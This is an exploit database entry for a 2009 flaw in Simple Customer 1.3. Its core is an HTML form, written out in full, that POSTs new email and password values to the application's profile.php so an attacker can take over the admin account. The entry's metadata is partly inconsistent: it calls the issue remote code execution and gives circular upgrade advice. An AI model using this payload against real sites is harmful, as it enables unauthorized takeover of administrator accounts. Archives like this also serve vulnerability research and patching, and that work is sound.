Remote Change admin Password

vendor:

Simple Customer 1.3

by:

ahmadbady

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Simple Customer 1.3

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:simple_customer:simple_customer:1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote Change admin Password

A vulnerability in Simple Customer 1.3 allows an attacker to remotely change the admin password by sending a maliciously crafted POST request to the profile.php page. This can be exploited to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of Simple Customer 1.3

Source

Exploit-DB raw data:

                 ---- Remote Change admin Password----
----------------------------
script:Simple Customer 1.3
----------------------------
Author: ahmadbady
email:kivi_hacker666@yahoo.com

--------------------
download from:http://www.simplecustomer.com/  New (Version 1.3)

--------------------
xpl:



</head>
<body>
<form action="http://www.simplecustomer.com/demo/profile.php" method="post">
<div class="container">
  <div class="leftcolumn">
    <h2>coded by ahmadbady</h2>
    </span>
    <form id="form1" name="form1" method="post" action="">
      <p>Email
        <br />
        <input name="email" type="text" id="email" value="" class="required validate-email" size="35" />
      </p>
      <p><br />
        <input name="password" type="password" id="password" />
          <br />
      </p>
      <p>Home Page<br />
        <input name="Submit2" type="submit" id="Submit2" value="Update" /> 
        </p>
    </form>

# milw0rm.com [2009-05-07]